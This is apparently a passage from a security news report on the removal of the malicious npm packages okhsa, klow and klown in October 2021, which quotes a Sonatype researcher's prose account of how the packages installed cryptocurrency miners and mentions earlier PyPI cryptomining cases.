The bad actor’s NPM account was deactivated, and the three libraries – okhsa, klow, and klown – were removed from the repository on October 15, 2021. The libraries were downloaded 112, 4, and 65 times respectively. “Klow” and “klown” have been tracked under Sonatype-2021-1472, and “okhsa” has been cataloged as Sonatype-2021-1473.
The attacks were carried out by running a .bat (for Windows) or .sh (for Unix-based OS) script:
“Packages ‘klow’ and ‘klown’ contain a cryptocurrency miner. These packages detect the current operating system at the preinstall stage, and proceed to run a .bat or .sh script depending on if the user is running Windows or a Unix-based operating system.”
“These scripts then download an externally-hosted EXE or a Linux ELF, and execute the binary with arguments specifying the mining pool to use, the wallet to mine cryptocurrency for, and the number of CPU threads to utilize,” Sonatype security researcher Ali ElShakankiry said.
This isn’t the first time that bad software has been found in the repository. Brandjacking, typosquatting, and cryptomining malware have been spotted before.
In June, security researchers from Sonatype and JFrog discovered packages on the PyPI repository that secretly deployed crypto-miners on affected machines. The packages were named after repositories or components from high-profile tech companies to perform what is known as dependency confusion attacks.